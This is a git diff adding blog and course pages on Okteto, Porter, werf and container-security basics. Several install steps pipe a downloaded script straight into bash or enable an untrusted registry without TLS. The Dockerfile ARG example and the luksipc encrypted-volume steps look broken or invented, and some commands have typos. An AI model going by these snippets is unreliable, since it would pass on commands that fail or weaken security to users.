docker.io/sangam14/okteto-2048-game:okteto@sha256:e7348f570cd90c473ff5e0707836843c092fb 0.2s + βœ“ Image 'docker.io/sangam14/okteto-2048-game:okteto' successfully pushed + i Running 'kubectl apply -f 2048.yaml' +deployment.apps/nginx-deployment configured +service/nginx-service configured + +``` + +### Build and Deploy Okteto App + + + +``` +➜ Okteto-2048 git:(main) βœ— okteto up nginx-deployment + i Using sangam14 @ cloud.okteto.com as context + i Images were already built. To rebuild your images run 'okteto build' or 'okteto deploy --build' + i Running 'kubectl apply -f 2048.yaml' +deployment.apps/nginx-deployment unchanged +service/nginx-service configured + i Images were already built. To rebuild your images run 'okteto build' or 'okteto deploy --build' + βœ“ Client certificates generated +Installing dependencies... +syncthing-macos-arm64-v1.23.1.zip 9.38 MiB / 9.38 MiB [-------------------------------------------] 100.00% 10.11 MiB p/s + βœ“ Dependencies successfully installed + i '.stignore' doesn't exist in folder '/Users/sangambiradar/Documents/GitHub/Okteto-2048/2048'. + i Okteto requires a '.stignore' file to ignore file patterns that help optimize the synchronization service. + ? Do you want to infer defaults for the '.stignore' file? (otherwise, it will be left blank) [Y/n]: y + βœ“ Persistent volume successfully attached + βœ“ Images successfully pulled + βœ“ Files synchronized + Context: cloud.okteto.com + Namespace: sangam14 + Name: nginx-deployment + Forward: 8080 -> 8081 + +root@nginx-deployment-okteto-6ff5f788c4-59wwn:/# ls +bin dev docker-entrypoint.sh home lib64 mnt proc run srv tmp var +boot docker-entrypoint.d etc lib media opt root sbin sys usr +root@nginx-deployment-okteto-6ff5f788c4-59wwn:/# cd usr/share/nginx/html +root@nginx-deployment-okteto-6ff5f788c4-59wwn:/usr/share/nginx/html# ls +CONTRIBUTING.md favicon.ico index.html js meta style +root@nginx-deployment-okteto-6ff5f788c4-59wwn:/usr/share/nginx/html# cat index.html + + + + + 2048 on Okteto Cloud + + + + + + + + + + + + + + +
+
+

2048

+
+
0
+
0
+
+
+ +
+

Join the numbers and get to the 2048 tile!

+ New Game +
+ +
+
+

+ +
+ +
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ +
+ +
+
+ +

+ How to play: Use your arrow keys to move the tiles. When two tiles with the same number touch, they merge into one! +

+
+

+ Note: This site is the official version of 2048. You can play it on your phone via http://git.io/2048. All other apps or sites are derivatives or fakes, and should be used with caution. +

+
+

+ Created by Gabriele Cirulli. Based on 1024 by Veewo Studio and conceptually similar to Threes by Asher Vollmer. +

+
+ + + + + + + + + + + + + +root@nginx-deployment-okteto-6ff5f788c4-59wwn:/usr/share/nginx/html# touch index1.html +root@nginx-deployment-okteto-6ff5f788c4-hkv5v:/usr/share/nginx/html# echo "sangam" > index1.html +root@nginx-deployment-okteto-6ff5f788c4-hkv5v:/usr/share/nginx/html# cat index1.html +sangam +``` +### you can see change on your endpoints + +https://nginx-service-sangam14.cloud.okteto.net/index1.html + +![](./index1.png) + +Github Source code for above demo : +{{< rawhtml >}} +
+{{< /rawhtml >}} + +Join [CloudNativeFolks Community](https://discord.gg/rEvr7vq) or Reach out to me on twitter [@sangamtwts](https://twitter.com/sangamtwts) + diff --git a/content/en/blog/okteto/index1 2.png b/content/en/blog/okteto/index1 2.png new file mode 100644 index 0000000..fab0e0a Binary files /dev/null and b/content/en/blog/okteto/index1 2.png differ diff --git a/content/en/blog/okteto/okteto 2.png b/content/en/blog/okteto/okteto 2.png new file mode 100644 index 0000000..24ab1a4 Binary files /dev/null and b/content/en/blog/okteto/okteto 2.png differ diff --git a/content/en/blog/okteto/okteto-2048-game 2.png b/content/en/blog/okteto/okteto-2048-game 2.png new file mode 100644 index 0000000..f8399e5 Binary files /dev/null and b/content/en/blog/okteto/okteto-2048-game 2.png differ diff --git a/content/en/blog/okteto/okteto-UI 2.png b/content/en/blog/okteto/okteto-UI 2.png new file mode 100644 index 0000000..8f6f25a Binary files /dev/null and b/content/en/blog/okteto/okteto-UI 2.png differ diff --git a/content/en/blog/okteto/okteto-login 2.png b/content/en/blog/okteto/okteto-login 2.png new file mode 100644 index 0000000..008b734 Binary files /dev/null and b/content/en/blog/okteto/okteto-login 2.png differ diff --git a/content/en/blog/porter/readme 2.md b/content/en/blog/porter/readme 2.md new file mode 100644 index 0000000..2699161 --- /dev/null +++ b/content/en/blog/porter/readme 2.md @@ -0,0 +1,40 @@ +--- +title : Porter - Create an installer bundling your application, client tools, configuration, and deployment logic for easy distribution and execution with a single command +author : Sangam Biradar +categories : + - Kubernetes +weight : 50 +description : Cloud Native Bundle for Developer +draft : false +Date : 2023-02-18 +author : Sangam Biradar +--- + + +#### Porter - Create an installer bundling your application, client tools, configuration, and deployment logic for easy distribution and execution with a single command + +Porter is a CNCF project implementing the CNAB specification. It provides a CLI and Kubernetes Operator to create, publish, install, and maintain CNABs. Porter provides a consistent, platform-agnostic way to deploy and manage cloud native applications, making it easier to automate and manage the lifecycle of your applications + + - CNAB, or Cloud-Native Application Bundle, is an open standard for packaging and distributing cloud-native applications and their dependencies across various platforms. It simplifies the deployment process, enhances security through digital signatures, and promotes interoperability across different environments, making it easier to manage complex cloud-native applications. + + +#### Install Porter + +``` +➜ export VERSION="v1.0.14" +curl -L https://cdn.porter.sh/$VERSION/install-mac.sh | bash + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed + 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0 +100 1204 100 1204 0 0 518 0 0:00:02 0:00:02 --:--:-- 2787 +Installing porter@v1.0.14 to /Users/sangambiradar/.porter from https://cdn.porter.sh +Installed porter v1.0.14 (0e739d88) +installed exec mixin v1.0.14 (0e739d88) +Installation complete. +Add porter to your path by adding the following line to your ~/.bash_profile or ~/.zprofile and open a new terminal: +export PATH=$PATH:~/.porter +➜ export PATH=$PATH:~/.porter +``` + +#### Initialize a New Porter Project + diff --git a/content/en/blog/werf/docker-desk 2.png b/content/en/blog/werf/docker-desk 2.png new file mode 100644 index 0000000..48c7f9d Binary files /dev/null and b/content/en/blog/werf/docker-desk 2.png differ diff --git a/content/en/blog/werf/index 2.md b/content/en/blog/werf/index 2.md new file mode 100644 index 0000000..41725f6 --- /dev/null +++ b/content/en/blog/werf/index 2.md @@ -0,0 +1,345 @@ +--- +title : Werf A solution for implementing efficient and consistent software +author : Sangam Biradar +categories : + - Kubernetes +weight : 60 +description : Reduce Inner Loop focus on Developing Application +draft : false +Date : 2023-02-19 +author : Sangam Biradar +--- + +{{< rawhtml >}} +
+
+{{< /rawhtml >}} +#### Install Werf + + + +```bash +➜ ~ curl -sSLO https://werf.io/install.sh && chmod +x install.sh +➜ ~ ./install.sh --version 1.2 --channel stable +[INPUT REQUIRED] Current login shell is "zsh". Press ENTER to setup werf for this shell or choose another one. +[b]ash/[z]sh/[a]bort? Default: zsh. +z +[INPUT REQUIRED] trdl is going to be installed in "/Users/sangambiradar/bin/". Add this directory to your $PATH in "/Users/sangambiradar/.zshrc" and "/Users/sangambiradar/.zprofile"? (strongly recommended) +[y]es/[a]bort/[s]kip? Default: yes. +yes +[INFO] Installing trdl to "/Users/sangambiradar/bin/". + +[INFO] Adding werf repo to trdl. +[INPUT REQUIRED] Add automatic werf activation to "/Users/sangambiradar/.zshrc" and "/Users/sangambiradar/.zprofile"? (recommended for interactive usage, not recommended for CI) +[y]es/[a]bort/[s]kip? Default: yes. +[INFO] werf installation finished successfully! +[INFO] Open new shell session if you have enabled werf autoactivation or activate werf manually with: +$ source $("/Users/sangambiradar/bin/trdl" use werf "1.2" "stable") +``` + +### werf use trdl + +trdl is an Open Source solution providing a secure channel for delivering updates from the Git repository to the end user. + + +![](./trdl.png) + +Problems that trdl solves for you +- Continuous delivery limitations + - Continuous delivery via the CI system works well for the SaaS model, that is, for software + - hosted on cloud servers. At the same time, you would be hard-pressed to find a tool that is as fast at delivering code to user devices. + +- Challenges related to implementing a secure delivery + - What complicates things: + - Software release and changes in release channels must only occur based on a collective decision of the team (quorum). + - The system must protect against unauthorized access and data compromise. + - The system must not be compromised by human mistakes, including regulation breaches. + +- Package manager limitations + - There are many package managers, but they all have common drawbacks: + - Each platform requires its own manager. + - The package creation process is complicated. + - There is a lot of manual work involved: the user has to add the package source, find the package, and install/upgrade/uninstall it. + + + +### verify werf cli installed or not + +``` +➜ ~ werf +werf helps to implement and support Continuous Integration and Continuous +Delivery. + +Find more information at https://werf.io + +Delivery commands: + converge Build and push images, then deploy application into Kubernetes + dismiss Delete werf release from Kubernetes + bundle Work with werf bundles: publish bundles into container + registry and deploy bundles into Kubernetes cluster + +Cleaning commands: + cleanup Cleanup project images in the container registry + purge Purge all project images in the container registry + +Helper commands: + ci-env Generate werf environment variables for specified CI system + build Build images + export Export images + run Run container for project image + kube-run Run container for project image in Kubernetes + compose Work with docker-compose + slugify Print slugged string by specified format. + render Render Kubernetes templates + +Low-level management commands: + config Work with werf.yaml + managed-images Work with managed images which will be preserved during + cleanup procedure + host Work with werf cache and data of all projects on the host + machine + helm Manage application deployment with helm + cr Work with container registry: authenticate, list and remove + images, etc. + kubectl kubectl controls the Kubernetes cluster manager + +Other commands: + synchronization Run synchronization server + completion Generate bash completion scripts + version Print version + +Use "werf --help" for more information about a given command. + +Version: v1.2.205 +➜ ~ +``` +### Setup Minikube for Werf + +``` + ~ minikube start --vm=true --insecure-registry registry.example.com:80 +πŸ˜„ minikube v1.30.0 on Darwin 13.3 (arm64) +✨ Automatically selected the qemu2 driver. Other choices: virtualbox, ssh +🌐 Automatically selected the builtin network +❗ You are using the QEMU driver without a dedicated network, which doesn't support `minikube service` & `minikube tunnel` commands. +To try the dedicated network see: https://minikube.sigs.k8s.io/docs/drivers/qemu/#networking +πŸ’Ώ Downloading VM boot image ... + > minikube-v1.30.0-arm64.iso....: 65 B / 65 B [---------] 100.00% ? p/s 0s + > minikube-v1.30.0-arm64.iso: 330.67 MiB / 330.67 MiB 100.00% 16.06 MiB p +πŸ‘ Starting control plane node minikube in cluster minikube +πŸ’Ύ Downloading Kubernetes v1.26.3 preload ... + > preloaded-images-k8s-v18-v1...: 330.52 MiB / 330.52 MiB 100.00% 16.66 M +πŸ”₯ Creating qemu2 VM (CPUs=2, Memory=4000MB, Disk=20000MB) ... +🐳 Preparing Kubernetes v1.26.3 on Docker 20.10.23 ... + β–ͺ Generating certificates and keys ... + β–ͺ Booting up control plane ... + β–ͺ Configuring RBAC rules ... +πŸ”— Configuring bridge CNI (Container Networking Interface) ... + β–ͺ Using image gcr.io/k8s-minikube/storage-provisioner:v5 +πŸ”Ž Verifying Kubernetes components... +🌟 Enabled addons: storage-provisioner, default-storageclass +πŸ„ Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default + +``` +`--insecure-registry` allows usage of Container Registry without TLS. + +### add on NGINX Ingress Controller & Container Registry to store images : + +``` +➜ ~ minikube addons enable ingress +πŸ’‘ ingress is an addon maintained by Kubernetes. For any concerns contact minikube on GitHub. +You can view the list of minikube maintainers at: https://github.com/kubernetes/minikube/blob/master/OWNERS + β–ͺ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20230312-helm-chart-4.5.2-28-g66a760794 + β–ͺ Using image registry.k8s.io/ingress-nginx/controller:v1.7.0 + β–ͺ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20230312-helm-chart-4.5.2-28-g66a760794 +πŸ”Ž Verifying ingress addon... +🌟 The 'ingress' addon is enabled +➜ ~ minikube addons enable registry +πŸ’‘ registry is an addon maintained by Google. For any concerns contact minikube on GitHub. +You can view the list of minikube maintainers at: https://github.com/kubernetes/minikube/blob/master/OWNERS + β–ͺ Using image gcr.io/google_containers/kube-registry-proxy:0.4 + β–ͺ Using image docker.io/registry:2.8.1 +πŸ”Ž Verifying registry addon... +🌟 The 'registry' addon is enabled +``` + +### Create Ingress to access Container Registry: + +``` +ubectl apply -f - << EOF +--- +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: registry + namespace: kube-system + annotations: + nginx.ingress.kubernetes.io/proxy-body-size: "0" +spec: + rules: + - host: registry.example.com + http: + paths: + - path: / + pathType: Prefix + backend: + service: + name: registry + port: + number: 80 +EOF + +``` + +### Allow usage of Container Registry without TLS for docker: + + +``` +{ + "insecure-registries" : ["registry.example.com:80"] +} +``` +add above configuration key +![](./docker-desk.png) + +``` +➜ ~ minikube start --vm=true --insecure-registry registry.example.com:80 +πŸ˜„ minikube v1.30.0 on Darwin 13.3 (arm64) +✨ Using the qemu2 driver based on existing profile +πŸ‘ Starting control plane node minikube in cluster minikube +πŸƒ Updating the running qemu2 "minikube" VM ... +🐳 Preparing Kubernetes v1.26.3 on Docker 20.10.23 ... +πŸ”Ž Verifying ingress addon... + β–ͺ Using image docker.io/registry:2.8.1 +πŸ”Ž Verifying Kubernetes components... + β–ͺ Using image gcr.io/google_containers/kube-registry-proxy:0.4 +πŸ”Ž Verifying registry addon... +🌟 Enabled addons: storage-provisioner, ingress, default-storageclass, registry +πŸ„ Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default + +``` + +### update hostfile and registry name + +``` + ~ echo "$(minikube ip) vote.quickstart-application.example.com result.quickstart-application.example.com registry.example.com" | sudo tee -a /etc/hosts +Password: +10.0.2.15 vote.quickstart-application.example.com result.quickstart-application.example.com registry.example.com +~ minikube ssh -- "echo $(minikube ip) registry.example.com | sudo tee -a /etc/hosts" +10.0.2.15 registry.example.com + +``` + +### lets test out simple voting app + +``` +➜ ~ git clone https://github.com/werf/quickstart-application +cd quickstart-application +Cloning into 'quickstart-application'... +remote: Enumerating objects: 1279, done. +remote: Total 1279 (delta 0), reused 0 (delta 0), pack-reused 1279 +Receiving objects: 100% (1279/1279), 1.05 MiB | 5.09 MiB/s, done. +Resolving deltas: 100% (515/515), done. + +``` + +#### we have voting , result and working dockerfile in werf.yaml + +``` + quickstart-application git:(main) cat werf.yaml +configVersion: 1 +project: quickstart-application +--- +image: vote +dockerfile: Dockerfile +context: vote +--- +image: result +dockerfile: Dockerfile +context: result +--- +image: worker +dockerfile: Dockerfile +context: worker + +``` + +### werf converge + +``` +werf converge --repo registry.example.com:80/quickstart-application +Version: v1.2.205 +Using werf config render file: /private/var/folders/xy/3ssjv1j152x3_0ryt4yb982c0000gn/T/werf-config-render-1406655825 + +β”Œ Concurrent builds plan (no more than 5 images at the same time) +β”‚ Set #0: +β”‚ - β›΅ image vote +β”‚ - β›΅ image result +β”‚ - β›΅ image worker +β”” Concurrent builds plan (no more than 5 images at the same time) + +β”Œ β›΅ image vote +β”‚ β”Œ Copy suitable stage from secondary :local +β”‚ β”‚ Use cache image for vote/dockerfile +β”‚ β”‚ name: registry.example.com:80/quickstart-application:08900098c0a1a06586f8909a6b77927db90bbd21b5a089330ccd6e35-1680637511061 +β”‚ β”‚ id: 2cb9949aa002 +β”‚ β”‚ created: 2023-04-05 01:15:10 +0530 IST +β”‚ β”‚ size: 51.2 MiB +β”‚ β”” Copy suitable stage from secondary :local (33.85 seconds) +β”” β›΅ image vote (111.86 seconds) + +β”Œ β›΅ image result +β”‚ β”Œ Copy suitable stage from secondary :local +β”‚ β”‚ Use cache image for result/dockerfile +β”‚ β”‚ name: registry.example.com:80/quickstart-application:78557a576585e3acba6868f3d28b70b601affb6364e377918b355f8b-1680637519961 +β”‚ β”‚ id: c14efe2c5cae +β”‚ β”‚ created: 2023-04-05 01:15:19 +0530 IST +β”‚ β”‚ size: 53.0 MiB +β”‚ β”” Copy suitable stage from secondary :local (43.51 seconds) +β”” β›΅ image result (91.21 seconds) + +β”Œ β›΅ image worker +β”‚ β”Œ Copy suitable stage from secondary :local +β”‚ β”‚ Use cache image for worker/dockerfile +β”‚ β”‚ name: registry.example.com:80/quickstart-application:f5eab243c67a973041e7f92ee9f5ff39d0d671536814a10bac957e82-1680637550923 +β”‚ β”‚ id: 74a6e53feb05 +β”‚ β”‚ created: 2023-04-05 01:15:50 +0530 IST +β”‚ β”‚ size: 74.2 MiB +β”‚ β”” Copy suitable stage from secondary :local (33.76 seconds) +β”” β›΅ image worker (96.56 seconds) + +Release "quickstart-application" does not exist. Installing it now. + +β”Œ Waiting for resources to become ready +β”‚ β”Œ Status progress +β”‚ β”‚ DEPLOYMENT REPLICAS AVAILABLE UP-TO-DATE +β”‚ β”‚ db 1/1 0 1 +β”‚ β”‚ β”‚ POD READY RESTARTS STATUS --- +β”‚ β”‚ └── 6676664f7d-sz6ct 0/1 0 ContainerCreating Waiting for: available 0->1 +β”‚ β”‚ redis 1/1 0 1 +β”‚ β”‚ result 1/1 0 1 +β”‚ β”‚ vote 1/1 0 1 ↡ +β”‚ β”‚ +β”‚ β”‚ worker 1/1 0 1 +β”‚ β”‚ β”‚ POD READY RESTARTS STATUS --- +β”‚ β”‚ └── 77b4769cd4-qlhkm 0/1 0 ContainerCreating Waiting for: available 0->1 +β”‚ β”‚ RESOURCE NAMESPACE CONDITION: CURRENT (DESIRED) +β”‚ β”‚ Service/vote quickstart-application - +β”‚ β”‚ Service/db quickstart-application - +β”‚ β”‚ Service/redis quickstart-application - +β”‚ β”‚ Service/result quickstart-application - ↡ +β”‚ β”‚ +β”‚ β”‚ Ingress/quickstart-application quickstart-application - +β”‚ β”” Status progress +β”‚ + +``` + +you will see results +- Go to the following URL to vote: vote.quickstart-application.example.com +- Go to the following URL to check the result of voting: result.quickstart-application.example.com + + +for more example check it out : https://werf.io/documentation/v1.2/usage/deploy/overview.html + + +Join [CloudNativeFolks Community](https://discord.gg/rEvr7vq) or Reach out to me on twitter [@sangamtwts](https://twitter.com/sangamtwts) diff --git a/content/en/blog/werf/trdl 2.png b/content/en/blog/werf/trdl 2.png new file mode 100644 index 0000000..1333a4a Binary files /dev/null and b/content/en/blog/werf/trdl 2.png differ diff --git a/content/en/blog/werf/werf 2.png b/content/en/blog/werf/werf 2.png new file mode 100644 index 0000000..bef5fd7 Binary files /dev/null and b/content/en/blog/werf/werf 2.png differ diff --git a/content/en/containersecurity/_overview 2.md b/content/en/containersecurity/_overview 2.md new file mode 100644 index 0000000..7d04db3 --- /dev/null +++ b/content/en/containersecurity/_overview 2.md @@ -0,0 +1,43 @@ +--- +title: Container Security +url: "containersecurity/overview" +aliases: +- "/containersecurity" +--- + +### Table of Content +| Title | Link | +| --------- | ------- | +| 1.What is container? |[lab](https://kubedaily.com/docs/0.0.1/container-security/what-is-container/) | +|2.Container vs. Virtualization|[lab](http://localhost:1313/docs/0.0.1/container-security/containervsvm/)| +|3.Container Advantage and Disadvantages| [lab](https://kubedaily.com/docs/0.0.1/container-security/container-adv-dis/)| +|4.Namespaces| [lab](https://kubedaily.com/docs/0.0.1/container-security/namespaces/)| +|5.Cgroups| |[lab](https://kubedaily.com/docs/0.0.1/container-security/cgroup/) | +|6.Capabilities|[lab](https://kubedaily.com/docs/0.0.1/container-security/capabilities/) | +|7.Docker architecture and its components|[lab](https://kubedaily.com/docs/0.0.1/container-security/docker-architecture/) | +|8.Interacting with container ecosystem|[lab](https://kubedaily.com/docs/0.0.1/container-security/intracting-with-container/) | +|9.Attack surface of the container ecosystem| [lab](https://kubedaily.com/docs/0.0.1/container-security/attack-surface/) | +|10.Environment variables|[lab](https://kubedaily.com/docs/0.0.1/container-security/envir-variables/) | +|11.Docker volumes|[lab](https://kubedaily.com/docs/0.0.1/container-security/docker-volumes/) | +|12.Docker Networking|[lab](https://kubedaily.com/docs/0.0.1/container-security/docker-networking/)| +|13.Auditing Docker Security|[lab](https://kubedaily.com/docs/0.0.1/container-security/auditing-docker-sec/) | +|14.Container Image Security|[lab](https://kubedaily.com/docs/0.0.1/container-security/container-image-security/) | +|15.DockerFile Security Best Practices|[lab](https://kubedaily.com/docs/0.0.1/container-security/dockerfile-security/) | +|16.SecretScanner - Finding secrets and passwords in container images and file systems | [lab](https://kubedaily.com/docs/0.0.1/container-security/secretscanner/)| +|17.YaraHunter - Malware Scanner for Container Images|[lab](https://kubedaily.com/docs/0.0.1/container-security/yarahunter/) | +|18.Security Linting of Dockerfiles| [lab](https://kubedaily.com/docs/0.0.1/container-security/security-linting-dockerfile/)| +|19.Static Analysis of container images/library for container|[lab](https://kubedaily.com/docs/0.0.1/container-security/packetscanner/) | +|20.Docker host security configurations|[lab](https://kubedaily.com/docs/0.0.1/container-security/seccomp-apparmor/) | +|21.Docker Daemon security configurations|[lab](https://kubedaily.com/docs/0.0.1/container-security/docker-daemon-sec/) | +|22.Content Trust and Integrity checks|[lab](https://kubedaily.com/docs/0.0.1/container-security/dct/) | +|23.Docker Registry security configurations|[lab](https://kubedaily.com/docs/0.0.1/container-security/docker-registry/) | +|24. DockerScan |[lab](https://kubedaily.com/docs/0.0.1/container-security/dockerscan/) | +|25.Dive|[lab](https://kubedaily.com/docs/0.0.1/container-security/dive/) | +|26.Scanning Docker for vulnerabilities with ThraetMappeper|[lab](https://kubedaily.com/docs/0.0.1/container-security/threatmapper-app/) | +|27.Docker events|[lab](https://kubedaily.com/docs/0.0.1/container-security/docker-events/) | +|28.Sock Shop Docker Compose & Weave|[lab](https://kubedaily.com/docs/0.0.1/container-security/sock-shop-weave/)| + + +What next + +- [Kubernetes Workshop](https://kubedaily.com/docs/0.0.1/k8s/) diff --git a/content/en/containersecurity/b1.what-is-container 2.md b/content/en/containersecurity/b1.what-is-container 2.md new file mode 100644 index 0000000..ed76a21 --- /dev/null +++ b/content/en/containersecurity/b1.what-is-container 2.md @@ -0,0 +1,72 @@ +--- +title: "What is container?" +description: "The introduction to this course." +slug: "what-is-container?" +--- + + +> what is container ? + +- A container is full package (or) grouping of an entire runtime enviroment of an application ncluding its binaries, the runtime to run the application, System related tools, System libraries, Settings, and configurations. + +thats the defination come to mind when you learn ? to better understanding we need to go back to Operating Syatem basics and how its work + +when a program?process is running on your computer it gives a call to kernel using SystemCall End Point whatever it needs to access any of the + +- hardwore resources like + - memory + - file system( hard disk ) + - CPU cycles + - Internet + - Bandwidth and I/O + - User Permission and privileges etc + +![](./images/OS-working.png) + +> What, If we want to Isolate a Single Program to run on virtual space or Environment? + +Let’s say I want to run chrome in a Virtual environment within the machine with its own CPU cycles, Memory, Hard Disk Space, Bandwidth, Users, Internet Usage etc. + +Something like shown in the following picture. A marked Space or Group. + +![](./images/OS-working-1.jpg) + +Is it possible? Yes, it is + +> Isolating the System Resources per process or group of Processes is called Name Spacing. and Limiting and Regulating the System resource allocation to the isolated process/procesesses is called Control Groups(Cgroups) + +> A coalesced(combined) product of Control Groups and Name Spacing with Process level isolation is called as Containerization or a Container + +> To be more clear. In the preceding diagram, The area or grouping, Marked in Red dotted lines is called as a Container. + +The following Diagram explains what is Name Spacing and Control Groups and their scope of responsibilities. + +![](./images/cgroup-namespace.png) + +What is inside a Container + +As we said just before, A Container a Collection of following elements + +- Program Binaries/configuration +- Runtime libraries +- Dependency Products/tools +- A Piece of Kernal +- System Resources + - Hard Disk + - Memory + - I/O + - Network + - CPU + +![](./images/container-skeleton.png) + +As we are isolating the program and dedicatedly providing its own system resources and runtime libraries. It can run alone as a Standalone application (or) infrastructure + +![](./images/tenor.gif) + +β€œIt was working fine in my laptop or machine” + +" Yes. It might have worked in the laptop (or) DEV, but that’s not enough for it to work in PROD or at least not the same way it’s working in DEV. " + + + diff --git a/content/en/containersecurity/b10.Envir-variables 2.md b/content/en/containersecurity/b10.Envir-variables 2.md new file mode 100644 index 0000000..59eca66 --- /dev/null +++ b/content/en/containersecurity/b10.Envir-variables 2.md @@ -0,0 +1,46 @@ +--- +title: "Environment variables " +description: "Environment variables" +slug: "Environment-variables" +--- + +Environment variables +example of using an environment variable in a Dockerfile: + +``` +FROM alpine:latest +# Set an environment variable +ENV MY_VAR "Hello World" +# Use the environment variable in a command +RUN echo $MY_VAR > /app/output.txt +CMD ["cat", "/app/output.txt"] +``` + +In this example, the environment variable MY_VAR is set to the value "Hello World". This variable is then used in the RUN command to create an output.txt file with the contents "Hello World". + +To build the Docker image using this Dockerfile, you can use the following command: + +``` +docker build -t my-image . +``` + +You can also set the value of the environment variable when you build the image using the `--build-arg` flag: + +``` +docker build -t my-image --build-arg MY_VAR=Goodbye . +``` + +This will set the value of MY_VAR to "Goodbye" when the image is built. + +It is also a good idea to use default values for environment variables in your Dockerfile. This way, if the variable is not set when the image is built, it will use the default value. You can do this by using the ARG directive in your Dockerfile and then using the := operator to set the default value: + +``` +FROM alpine:latest +# Set a default value for the environment variable +ARG MY_VAR:=Hello World +# Use the environment variable in a command +RUN echo $MY_VAR > /app/output.txt +CMD ["cat", "/app/output.txt"] +``` + +In this example, if the value of MY_VAR is not set when the image is built, it will default to the value "Hello World". diff --git a/content/en/containersecurity/b11.Docker-volumes 2.md b/content/en/containersecurity/b11.Docker-volumes 2.md new file mode 100644 index 0000000..b50a3ba --- /dev/null +++ b/content/en/containersecurity/b11.Docker-volumes 2.md @@ -0,0 +1,41 @@ +--- +title: "Docker volumes " +slug: "docker-volumes" +--- + +Docker volumes +# How to create encrypted data volume + + +Create a Docker volume using the docker volume create command, for example: + +``` +$ docker volume create encrypted_volume +``` + +Create a Docker container that will be used to create the encrypted volume. For this, you can use a tool like luksipc, which allows you to create a LUKS-encrypted file within a container. + +Run the `luksipc`container with the `--volume` flag to specify the Docker volume you want to encrypt. For example: + +``` +$ docker run --rm -it --volume encrypted_volume:/volume luksipc create +``` + +Follow the prompts to create the encrypted volume. You will be asked to specify a passphrase that will be used to encrypt and decrypt the volume. + +Once the volume is created, you can use it like any other Docker volume. For example, you can mount it to a container using the -v flag: + +``` +$ docker run --rm -it -v encrypted_volume:/data ubuntu bash + +``` + +To decrypt the volume, you can use the `luksipc` container again and specify the unlock command. You will be prompted for the passphrase you specified when creating the volume: + +``` +$ docker run --rm -it --volume encrypted_volume:/volume luksipc unlock + +``` + +You can then access the decrypted data within the volume from within the container. +Note: This is just one example of how to create an encrypted Docker volume. There are other tools and methods available that you can use to achieve the same result. \ No newline at end of file diff --git a/content/en/containersecurity/b12.Docker-Networking 2.md b/content/en/containersecurity/b12.Docker-Networking 2.md new file mode 100644 index 0000000..9f83465 --- /dev/null +++ b/content/en/containersecurity/b12.Docker-Networking 2.md @@ -0,0 +1,90 @@ +--- +title: "Docker Networking " +description: " Docker Networking " +slug: "docker-networking" +--- + +## Docker Networking + +The Container Netwotk Model (CNM) is the design document for Docker Networking which is implemented via 'libnetwork' in golang + +- Sandbox - isolated network stavk +- Endpount - Virtual Ethernet Interfece +- Network - Virtual Switch (bridge) + + +Note - Libnetwork -> implemenrs the control and management plane functions + +Network Specific Drivers -> implemenrs the data plane while also handling the connectivity and isolation + + +# Docker Native Network Drivers + +- Bridge - uses a software bridge whicha allows containers connected to the same bridge network to communicate + +- Host - Connects the docker host and containers to use hosts networking directly + +- Overlay - used for multi-host networking which allows a single network to span multiple hosts such that containers on diffenet hosts can communicate at layer 2 + + +- Macvlan - Useful for lagacy and monitor apps which expect to directly conneted to physical network +as it assigns completely the networkinh stack on container . No IP will be configuared with this driver + + +# Docker Networking ( Hands-on ) + +``` +$ docker network --help + +``` +1. check what networks are already present in the docker by default + +``` +$ dokcer run -itd --name netcon ubuntu /bin/bash +``` +check for the network placement of this container in the above networks. We see that by default all containers got attached to bridge network using `network inspect command ` this could be done + +``` +$ docker network inspect bridge +``` + +In the `Container ` option abobe the information about container name , IPv4 etc present + +Run another container `net2con` from busybox image and check its network placement same as above + +``` +docker run -itd --name net2con busybox /bin/bash +``` + +lets us now run nginx container as `net3con-web` with exposed port + +``` +docker run -itd --name net3con-web -p 5000:80 nginx + +``` + +to check for the port correctly setup and exposed , one can use `port ` command followed by container name . + +``` + +docker port net3con-web +``` + +to visualize only the relavant information which is the ` Containers` block from `inspect` command output use `-f` option to format the JSON and parse it via `jq` ulaitity + +``` +docker network inspect bridege -f "{{json.Containers}}" | jq +``` + +one can also oberserve the associated `bridge.id` to `docker0` default bridge with all the containers attached via `vethxxxxxx` virtual ethernet interfces + +``` +$brctl show +``` + +# concusion + +Cgroups and Namespaces provides essential isolation and limits the container resources. This is highly valuable for the Docker host system in case of DoS Attacks wherein if resources are set minimally, less harm will be there. For resource isolation, feel free to look over to the Linux 'cgcreate', 'cgdelete', 'cgset' and related parameters like 'cpuset', 'cpuacct', etc. Running containers and walking around the namespaces, cgroups, container networking + + + diff --git a/content/en/containersecurity/b13.Auditing-docker-sec 2.md b/content/en/containersecurity/b13.Auditing-docker-sec 2.md new file mode 100644 index 0000000..5ae3497 --- /dev/null +++ b/content/en/containersecurity/b13.Auditing-docker-sec 2.md @@ -0,0 +1,501 @@ +--- +title: "Auditing Docker Security " +slug: "Auditing-Docker-Security" +--- + +## Auditing Docker Security + +DOCKER BENCH FOR SECURITY + +Docker Bench for Security is an open source Bash script that checks for various common security best practices of deploying Docker in production environments. The tests are all automated and are based on the CIS Docker Benchmark. More information about Docker Bench for Security can be found +on GitHub: https://github.com/docker/docker-bench-security + + +## auditing docker security with docker bench for security + + +The auditing process can be performed by following the procedures outlined below: + +You first need to clone the docker/docker-bench-security GitHub repository on your Docker host. This can be done by running the following command: + + +``` +git clone https://github.com/docker/docker-bench-security.git +``` +After cloning the repository, you will need to navigate into the docker-bench-security repository that you just cloned: + +``` +cd docker-bench-security + + +``` + +The cloned directory will contain a Bash script named docker-bench-security.sh. We can run this script to perform the Docker security audit by running the following command: + +``` +sudo ./docker-bench-security.sh +``` + +When the script is executed, it will perform all the necessary security checks. Once completed, it will provide you with a baseline security score as highlighted + +``` +Section C - Score + +[INFO] Checks: 117 +[INFO] Score: -5 + +``` + +# Docker Bench for Security Options + +```bash + b optional Do not print colors + -h optional Print this help message + -l FILE optional Log output in FILE, inside container if run using docker + -u USERS optional Comma delimited list of trusted docker user(s) + -c CHECK optional Comma delimited list of specific check(s) id + -e CHECK optional Comma delimited list of specific check(s) id to exclude + -i 